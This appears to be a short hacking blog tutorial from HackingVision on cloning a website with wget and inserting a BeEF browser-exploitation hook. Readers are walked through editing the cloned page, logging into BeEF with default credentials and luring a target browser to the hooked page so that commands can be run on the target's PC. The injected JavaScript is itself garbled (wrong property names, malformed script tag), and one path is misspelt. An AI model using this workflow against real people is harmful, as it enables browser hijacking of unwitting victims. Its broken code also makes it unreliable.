Beef-XSS

Cloning websites to use with Beef-XSS – HackingVision

by

Cloning websites to use with Beef-XSS

Welcome to HackingVision, Last time we talked about adding your own html templates to Beef-XSS. Today we will learn how to clone a website to use with Beef-XSS.

 

In this tutorial we are using an Operating System called Kali Linux if you don’t already have Kali Linux you can download it here. If you are using an alternative Linux distribution you will need to install Beef-XSS.

Step 1:

Open up a new terminal in Kali Linux, enter command

 mkdir /usr/share/beef-xss/extensions/demos/html/websites/

 

Next we need to change into beef-xss working directory. We can do this by entering the command below in our terminal.

 

cd /usr/share/beefxss/extensions/demos/html/websites/

 

Step 2: Cloning Websites wget

Lets clone a website to Beef-XSS, to clone website to beef we will be working will a utility called  wget.

 

Example:

wget https://hackingvision.com

 

 

Step 3: Adding Java Script Hook to Cloned Website

We can open and modify cloned html website using gedit.

gedit /usr/share/beef-xss/extensions/demos/html/websites/index.html

 

 

Add this simple piece of  java script below to the <head> of cloned html website.

 

var commandModuleStr = ‘<script src”‘ + window.location.proto + ‘//’ + windows.location.host + ‘” type=”text/javascript”>’;                                   document.write(commandModuleStr);

Start beef-xss in a terminal you can do this by typing beef-xss and press enter.

Open your local IP address in brower.

Change local IP address 127.0.0.1 to 192.168.x.x or whatever your local host IP is mine is 192.168.1.121

Step 4: Default Credentials for Beef

User: beef

Pass: beef

Now you have logged into beef framework let start hooking some browsers.

Send target browser to IP addesss that is hosting our beef hook.

http://192.168.1.121:3000/demos/websites/index.html

Change local host IP 192.168.1.121 to you localhost IP.

 

Once target browser opens up the website template we have hooked in beef. Target browser will then be added to hooked browsers in left side panel in beef framework.

 

You are now able to run commands on the targets pc using Beef’s built in modules.